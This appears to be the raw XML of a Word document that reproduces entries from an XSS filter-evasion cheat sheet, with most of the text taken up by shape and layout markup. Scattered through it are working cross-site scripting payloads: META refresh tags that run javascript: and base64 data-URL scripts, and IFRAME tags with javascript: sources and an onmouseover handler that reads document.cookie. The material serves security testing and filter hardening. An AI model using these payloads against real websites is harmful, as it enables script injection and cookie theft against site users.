                <v:shape id="Freeform 755" o:spid="_x0000_s1678" style="position:absolute;width:8080;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="808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+0Z8UA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWsCMRSE70L/Q3hCb5rVpbauRqmCIHhRW+r1kTx3&#10;Fzcv6ybVrb/eCEKPw8x8w0znra3EhRpfOlYw6CcgiLUzJecKvr9WvQ8QPiAbrByTgj/yMJ+9dKaY&#10;GXflHV32IRcRwj5DBUUIdSal1wVZ9H1XE0fv6BqLIcoml6bBa4TbSg6TZCQtlhwXCqxpWZA+7X+t&#10;guUtP+vtZrXwaaWHh/H6sPvRqVKv3fZzAiJQG/7Dz/baKHh/S+FxJh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j7RnxQAAANwAAAAPAAAAAAAAAAAAAAAAAJgCAABkcnMv&#10;ZG93bnJldi54bWxQSwUGAAAAAAQABAD1AAAAigMAAAAA&#10;" path="m8059,182l21,182r-3,l,161r,-3l,21,21,,8059,r21,21l8080,161r-18,21l8059,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="8059,182;21,182;18,182;0,161;0,158;0,21;21,0;8059,0;8080,21;8080,161;8062,182;8059,182" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 754" o:spid="_x0000_s1679" type="#_x0000_t202" style="position:absolute;width:808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26Cc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K38S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26Cc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EQUIV="refresh"</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing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CONTENT="0;url=data:text/html</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="11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base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"&gt;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3"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="Balk4"/>
        <w:spacing w:before="102"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:w w:val="105"/>
        </w:rPr>
        <w:t>META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-3"/>
          <w:w w:val="105"/>
        </w:rPr>
        <w:t>Additional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URL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Parameter</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00AC7743">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="12"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00AC7743">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="12"/>
        </w:rPr>
        <w:sectPr w:rsidR="00AC7743">
          <w:pgSz w:w="11920" w:h="16860"/>
          <w:pgMar w:top="134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101" w:line="319" w:lineRule="auto"/>
        <w:ind w:left="154"/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15846912" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>3640455</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>67945</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="579120" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="749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5733" y="107"/>
                          <a:chExt cx="912" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="750" name="Freeform 752"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="5733" y="107"/>
                            <a:ext cx="912" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 6623 5733"/>
                              <a:gd name="T1" fmla="*/ T0 w 912"/>
                              <a:gd name="T2" fmla="+- 0 289 107"/>
                              <a:gd name="T3" fmla="*/ 289 h 183"/>
                              <a:gd name="T4" fmla="+- 0 5754 5733"/>
                              <a:gd name="T5" fmla="*/ T4 w 912"/>
                              <a:gd name="T6" fmla="+- 0 289 107"/>
                              <a:gd name="T7" fmla="*/ 289 h 183"/>
                              <a:gd name="T8" fmla="+- 0 5751 5733"/>
                              <a:gd name="T9" fmla="*/ T8 w 912"/>
                              <a:gd name="T10" fmla="+- 0 289 107"/>
                              <a:gd name="T11" fmla="*/ 289 h 183"/>
                              <a:gd name="T12" fmla="+- 0 5733 5733"/>
                              <a:gd name="T13" fmla="*/ T12 w 912"/>
                              <a:gd name="T14" fmla="+- 0 268 107"/>
                              <a:gd name="T15" fmla="*/ 268 h 183"/>
                              <a:gd name="T16" fmla="+- 0 5733 5733"/>
                              <a:gd name="T17" fmla="*/ T16 w 912"/>
                              <a:gd name="T18" fmla="+- 0 265 107"/>
                              <a:gd name="T19" fmla="*/ 265 h 183"/>
                              <a:gd name="T20" fmla="+- 0 5733 5733"/>
                              <a:gd name="T21" fmla="*/ T20 w 912"/>
                              <a:gd name="T22" fmla="+- 0 128 107"/>
                              <a:gd name="T23" fmla="*/ 128 h 183"/>
                              <a:gd name="T24" fmla="+- 0 5754 5733"/>
                              <a:gd name="T25" fmla="*/ T24 w 912"/>
                              <a:gd name="T26" fmla="+- 0 107 107"/>
                              <a:gd name="T27" fmla="*/ 107 h 183"/>
                              <a:gd name="T28" fmla="+- 0 6623 5733"/>
                              <a:gd name="T29" fmla="*/ T28 w 912"/>
                              <a:gd name="T30" fmla="+- 0 107 107"/>
                              <a:gd name="T31" fmla="*/ 107 h 183"/>
                              <a:gd name="T32" fmla="+- 0 6644 5733"/>
                              <a:gd name="T33" fmla="*/ T32 w 912"/>
                              <a:gd name="T34" fmla="+- 0 128 107"/>
                              <a:gd name="T35" fmla="*/ 128 h 183"/>
                              <a:gd name="T36" fmla="+- 0 6644 5733"/>
                              <a:gd name="T37" fmla="*/ T36 w 912"/>
                              <a:gd name="T38" fmla="+- 0 268 107"/>
                              <a:gd name="T39" fmla="*/ 268 h 183"/>
                              <a:gd name="T40" fmla="+- 0 6627 5733"/>
                              <a:gd name="T41" fmla="*/ T40 w 912"/>
                              <a:gd name="T42" fmla="+- 0 289 107"/>
                              <a:gd name="T43" fmla="*/ 289 h 183"/>
                              <a:gd name="T44" fmla="+- 0 6623 5733"/>
                              <a:gd name="T45" fmla="*/ T44 w 912"/>
                              <a:gd name="T46" fmla="+- 0 289 107"/>
                              <a:gd name="T47" fmla="*/ 2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1" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="911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5733" y="107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&lt;http://&gt;;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0" o:spid="_x0000_s1680" style="position:absolute;left:0;text-align:left;margin-left:286.65pt;margin-top:5.35pt;width:45.6pt;height:9.15pt;z-index:15846912;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="5733,107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">
                <v:shape id="Freeform 752" o:spid="_x0000_s1681" style="position:absolute;left:5733;top:107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SYkMAA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbERPy4rCMBTdD/gP4QruNFXwVY0iMjMqCOLjAy7NtSk2&#10;N22T0c7fTxbCLA/nvVy3thRPanzhWMFwkIAgzpwuOFdwu371ZyB8QNZYOiYFv+Rhvep8LDHV7sVn&#10;el5CLmII+xQVmBCqVEqfGbLoB64ijtzdNRZDhE0udYOvGG5LOUqSibRYcGwwWNHWUPa4/FgF9fep&#10;IN59jurau+k1OxpzmLdK9brtZgEiUBv+xW/3XiuYjuP8eCYeAbn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9SYkMAAAADcAAAADwAAAAAAAAAAAAAAAACYAgAAZHJzL2Rvd25y&#10;ZXYueG1sUEsFBgAAAAAEAAQA9QAAAIUDAAAAAA==&#10;" path="m890,182r-869,l18,182,,161r,-3l,21,21,,890,r21,21l911,161r-17,21l890,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="890,289;21,289;18,289;0,268;0,265;0,128;21,107;890,107;911,128;911,268;894,289;890,289" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 751" o:spid="_x0000_s1682" type="#_x0000_t202" style="position:absolute;left:5733;top:107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oZkc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oZkc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&lt;http://&gt;;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target</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>website</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>attempts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see</w:t>
      </w:r>
      <w:r>
        <w:rPr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URL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>contains</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-37"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>following</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>technique</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>(Submitted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Moritz</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Naumann):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="101"/>
        <w:ind w:left="154"/>
      </w:pPr>
      <w:r>
        <w:br w:type="column"/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>at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beginning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evade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num="2" w:space="708" w:equalWidth="0">
            <w:col w:w="4272" w:space="803"/>
            <w:col w:w="3945"/>
          </w:cols>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00AC7743">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="8"/>
        <w:rPr>
          <w:sz w:val="15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4382770" cy="116205"/>
                <wp:effectExtent l="5715" t="4445" r="2540" b="3175"/>
                <wp:docPr id="746" name="Group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2770" cy="116205"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="6902" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="747" name="Freeform 7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902" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="*/ 6880 w 6902"/>
                              <a:gd name="T1" fmla="*/ 182 h 183"/>
                              <a:gd name="T2" fmla="*/ 21 w 6902"/>
                              <a:gd name="T3" fmla="*/ 182 h 183"/>
                              <a:gd name="T4" fmla="*/ 18 w 6902"/>
                              <a:gd name="T5" fmla="*/ 182 h 183"/>
                              <a:gd name="T6" fmla="*/ 0 w 6902"/>
                              <a:gd name="T7" fmla="*/ 161 h 183"/>
                              <a:gd name="T8" fmla="*/ 0 w 6902"/>
                              <a:gd name="T9" fmla="*/ 158 h 183"/>
                              <a:gd name="T10" fmla="*/ 0 w 6902"/>
                              <a:gd name="T11" fmla="*/ 21 h 183"/>
                              <a:gd name="T12" fmla="*/ 21 w 6902"/>
                              <a:gd name="T13" fmla="*/ 0 h 183"/>
                              <a:gd name="T14" fmla="*/ 6880 w 6902"/>
                              <a:gd name="T15" fmla="*/ 0 h 183"/>
                              <a:gd name="T16" fmla="*/ 6901 w 6902"/>
                              <a:gd name="T17" fmla="*/ 21 h 183"/>
                              <a:gd name="T18" fmla="*/ 6901 w 6902"/>
                              <a:gd name="T19" fmla="*/ 161 h 183"/>
                              <a:gd name="T20" fmla="*/ 6883 w 6902"/>
                              <a:gd name="T21" fmla="*/ 182 h 183"/>
                              <a:gd name="T22" fmla="*/ 6880 w 6902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6902" h="183">
                                <a:moveTo>
                                  <a:pt x="688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880" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="6901" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="6901" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="6883" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="688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Text Box 74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90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&lt;META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7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HTTP-EQUIV="refresh"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CONTENT="0;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URL=http://;URL=javascript:alert('XSS');"&gt;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47" o:spid="_x0000_s1683" style="width:345.1pt;height:9.15pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="690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">
                <v:shape id="Freeform 749" o:spid="_x0000_s1684" style="position:absolute;width:6902;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="690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XzPsUA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPT2sCMRTE7wW/Q3hCbzVbu2jZGkUUobf6j/b6unnd&#10;bE1elk26rt++EQSPw8z8hpktemdFR22oPSt4HmUgiEuva64UHA+bp1cQISJrtJ5JwYUCLOaDhxkW&#10;2p95R90+ViJBOBSowMTYFFKG0pDDMPINcfJ+fOswJtlWUrd4TnBn5TjLJtJhzWnBYEMrQ+Vp/+cU&#10;5MfJi738fn92H/lWr082bL5MUOpx2C/fQETq4z18a79rBdN8Ctcz6Qj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hfM+xQAAANwAAAAPAAAAAAAAAAAAAAAAAJgCAABkcnMv&#10;ZG93bnJldi54bWxQSwUGAAAAAAQABAD1AAAAigMAAAAA&#10;" path="m6880,182l21,182r-3,l,161r,-3l,21,21,,6880,r21,21l6901,161r-18,21l6880,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="6880,182;21,182;18,182;0,161;0,158;0,21;21,0;6880,0;6901,21;6901,161;6883,182;6880,182" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 748" o:spid="_x0000_s1685" type="#_x0000_t202" style="position:absolute;width:690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km0c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s9x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iSbR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&lt;META</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="67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HTTP-EQUIV="refresh"</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="6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CONTENT="0;</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="6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URL=http://;URL=javascript:alert('XSS');"&gt;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3"/>
        <w:rPr>
          <w:sz w:val="25"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="Balk2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:w w:val="105"/>
        </w:rPr>
        <w:t>IFRAME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before="1"/>
        <w:ind w:left="154"/>
      </w:pPr>
      <w:r>
        <w:t>If</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>iframes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7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allowed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7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lot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XSS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>problems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well:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="8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0406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151765</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2615565" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="743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5565" cy="116205"/>
                          <a:chOff x="1614" y="239"/>
                          <a:chExt cx="4119" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="744" name="Freeform 746"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1614" y="239"/>
                            <a:ext cx="4119" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 5712 1614"/>
                              <a:gd name="T1" fmla="*/ T0 w 4119"/>
                              <a:gd name="T2" fmla="+- 0 422 239"/>
                              <a:gd name="T3" fmla="*/ 422 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1635 1614"/>
                              <a:gd name="T5" fmla="*/ T4 w 4119"/>
                              <a:gd name="T6" fmla="+- 0 422 239"/>
                              <a:gd name="T7" fmla="*/ 422 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1632 1614"/>
                              <a:gd name="T9" fmla="*/ T8 w 4119"/>
                              <a:gd name="T10" fmla="+- 0 421 239"/>
                              <a:gd name="T11" fmla="*/ 421 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1614 1614"/>
                              <a:gd name="T13" fmla="*/ T12 w 4119"/>
                              <a:gd name="T14" fmla="+- 0 400 239"/>
                              <a:gd name="T15" fmla="*/ 400 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1614 1614"/>
                              <a:gd name="T17" fmla="*/ T16 w 4119"/>
                              <a:gd name="T18" fmla="+- 0 397 239"/>
                              <a:gd name="T19" fmla="*/ 397 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1614 1614"/>
                              <a:gd name="T21" fmla="*/ T20 w 4119"/>
                              <a:gd name="T22" fmla="+- 0 260 239"/>
                              <a:gd name="T23" fmla="*/ 260 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1635 1614"/>
                              <a:gd name="T25" fmla="*/ T24 w 4119"/>
                              <a:gd name="T26" fmla="+- 0 239 239"/>
                              <a:gd name="T27" fmla="*/ 239 h 183"/>
                              <a:gd name="T28" fmla="+- 0 5712 1614"/>
                              <a:gd name="T29" fmla="*/ T28 w 4119"/>
                              <a:gd name="T30" fmla="+- 0 239 239"/>
                              <a:gd name="T31" fmla="*/ 239 h 183"/>
                              <a:gd name="T32" fmla="+- 0 5733 1614"/>
                              <a:gd name="T33" fmla="*/ T32 w 4119"/>
                              <a:gd name="T34" fmla="+- 0 260 239"/>
                              <a:gd name="T35" fmla="*/ 260 h 183"/>
                              <a:gd name="T36" fmla="+- 0 5733 1614"/>
                              <a:gd name="T37" fmla="*/ T36 w 4119"/>
                              <a:gd name="T38" fmla="+- 0 400 239"/>
                              <a:gd name="T39" fmla="*/ 400 h 183"/>
                              <a:gd name="T40" fmla="+- 0 5715 1614"/>
                              <a:gd name="T41" fmla="*/ T40 w 4119"/>
                              <a:gd name="T42" fmla="+- 0 421 239"/>
                              <a:gd name="T43" fmla="*/ 421 h 183"/>
                              <a:gd name="T44" fmla="+- 0 5712 1614"/>
                              <a:gd name="T45" fmla="*/ T44 w 4119"/>
                              <a:gd name="T46" fmla="+- 0 422 239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19" h="183">
                                <a:moveTo>
                                  <a:pt x="4098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098" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4119" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4119" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4101" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4098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Text Box 745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39"/>
                            <a:ext cx="411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&lt;IFRAME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9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SRC="javascript:alert('XSS');"&gt;&lt;/IFRAME&gt;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4" o:spid="_x0000_s1686" style="position:absolute;margin-left:80.7pt;margin-top:11.95pt;width:205.95pt;height:9.15pt;z-index:-15612416;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1614,239" coordsize="411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">
                <v:shape id="Freeform 746" o:spid="_x0000_s1687" style="position:absolute;left:1614;top:239;width:4119;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="411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cl0cUA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBSE70L/w/IKvemmqZga3YRiKfXiwdiD3h7Z&#10;1yQ0+zbsrpr+e7dQ8DjMzDfMuhxNLy7kfGdZwfMsAUFcW91xo+Dr8DF9BeEDssbeMin4JQ9l8TBZ&#10;Y67tlfd0qUIjIoR9jgraEIZcSl+3ZNDP7EAcvW/rDIYoXSO1w2uEm16mSbKQBjuOCy0OtGmp/qnO&#10;RoE/7bM09S/Lio+ZQ9sd9OfuXamnx/FtBSLQGO7h//ZWK8jmc/g7E4+AL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RyXRxQAAANwAAAAPAAAAAAAAAAAAAAAAAJgCAABkcnMv&#10;ZG93bnJldi54bWxQSwUGAAAAAAQABAD1AAAAigMAAAAA&#10;" path="m4098,183l21,183r-3,-1l,161r,-3l,21,21,,4098,r21,21l4119,161r-18,21l4098,183xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="4098,422;21,422;18,421;0,400;0,397;0,260;21,239;4098,239;4119,260;4119,400;4101,421;4098,422" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 745" o:spid="_x0000_s1688" type="#_x0000_t202" style="position:absolute;left:1614;top:239;width:411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iJT8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K31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iJT8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&lt;IFRAME</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="9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SRC="javascript:alert('XSS');"&gt;&lt;/IFRAME&gt;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IFRAME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Based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ind w:left="154"/>
      </w:pPr>
      <w:r>
        <w:t>IFrames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most</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9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elements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event</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>based</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>mayhem</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>like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following...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>(Submitted</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>by:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>David</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Cross)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="9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0457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3256280" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="740" name="Group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56280" cy="116205"/>
                          <a:chOff x="1614" y="240"/>
                          <a:chExt cx="5128" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="741" name="Freeform 743"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1614" y="240"/>
                            <a:ext cx="5128" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 6721 1614"/>
                              <a:gd name="T1" fmla="*/ T0 w 5128"/>
                              <a:gd name="T2" fmla="+- 0 422 240"/>
                              <a:gd name="T3" fmla="*/ 422 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1635 1614"/>
                              <a:gd name="T5" fmla="*/ T4 w 5128"/>
                              <a:gd name="T6" fmla="+- 0 422 240"/>
                              <a:gd name="T7" fmla="*/ 422 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1632 1614"/>
                              <a:gd name="T9" fmla="*/ T8 w 5128"/>
                              <a:gd name="T10" fmla="+- 0 422 240"/>
                              <a:gd name="T11" fmla="*/ 422 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1614 1614"/>
                              <a:gd name="T13" fmla="*/ T12 w 5128"/>
                              <a:gd name="T14" fmla="+- 0 401 240"/>
                              <a:gd name="T15" fmla="*/ 401 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1614 1614"/>
                              <a:gd name="T17" fmla="*/ T16 w 5128"/>
                              <a:gd name="T18" fmla="+- 0 398 240"/>
                              <a:gd name="T19" fmla="*/ 398 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1614 1614"/>
                              <a:gd name="T21" fmla="*/ T20 w 5128"/>
                              <a:gd name="T22" fmla="+- 0 261 240"/>
                              <a:gd name="T23" fmla="*/ 261 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1635 1614"/>
                              <a:gd name="T25" fmla="*/ T24 w 5128"/>
                              <a:gd name="T26" fmla="+- 0 240 240"/>
                              <a:gd name="T27" fmla="*/ 240 h 183"/>
                              <a:gd name="T28" fmla="+- 0 6721 1614"/>
                              <a:gd name="T29" fmla="*/ T28 w 5128"/>
                              <a:gd name="T30" fmla="+- 0 240 240"/>
                              <a:gd name="T31" fmla="*/ 240 h 183"/>
                              <a:gd name="T32" fmla="+- 0 6742 1614"/>
                              <a:gd name="T33" fmla="*/ T32 w 5128"/>
                              <a:gd name="T34" fmla="+- 0 261 240"/>
                              <a:gd name="T35" fmla="*/ 261 h 183"/>
                              <a:gd name="T36" fmla="+- 0 6742 1614"/>
                              <a:gd name="T37" fmla="*/ T36 w 5128"/>
                              <a:gd name="T38" fmla="+- 0 401 240"/>
                              <a:gd name="T39" fmla="*/ 401 h 183"/>
                              <a:gd name="T40" fmla="+- 0 6724 1614"/>
                              <a:gd name="T41" fmla="*/ T40 w 5128"/>
                              <a:gd name="T42" fmla="+- 0 422 240"/>
                              <a:gd name="T43" fmla="*/ 422 h 183"/>
                              <a:gd name="T44" fmla="+- 0 6721 1614"/>
                              <a:gd name="T45" fmla="*/ T44 w 5128"/>
                              <a:gd name="T46" fmla="+- 0 422 240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128" h="183">
                                <a:moveTo>
                                  <a:pt x="5107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107" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="5128" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="5128" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="5110" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="510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Text Box 742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0"/>
                            <a:ext cx="512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&lt;IFRAME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SRC=#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onmouseover="alert(document.cookie)"&gt;&lt;/IFRAME&gt;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1" o:spid="_x0000_s1689" style="position:absolute;margin-left:80.7pt;margin-top:12pt;width:256.4pt;height:9.15pt;z-index:-15611904;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1614,240" coordsize="5128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">
                <v:shape id="Freeform 743" o:spid="_x0000_s1690" style="position:absolute;left:1614;top:240;width:5128;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="512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5wScYA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBSE74X+h+UVeim6SUmrRFexFUU8afTg8ZF9&#10;JsHs25Ddxthf7wqFHoeZ+YaZzntTi45aV1lWEA8jEMS51RUXCo6H1WAMwnlkjbVlUnAjB/PZ89MU&#10;U22vvKcu84UIEHYpKii9b1IpXV6SQTe0DXHwzrY16INsC6lbvAa4qeV7FH1KgxWHhRIb+i4pv2Q/&#10;RkEW//rlbrnqb111Wrxt18nH7itR6vWlX0xAeOr9f/ivvdEKRkkMjzPhCMjZ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Y5wScYAAADcAAAADwAAAAAAAAAAAAAAAACYAgAAZHJz&#10;L2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA9QAAAIsDAAAAAA==&#10;" path="m5107,182l21,182r-3,l,161r,-3l,21,21,,5107,r21,21l5128,161r-18,21l5107,182xe" fillcolor="#f5f5f5" stroked="f">
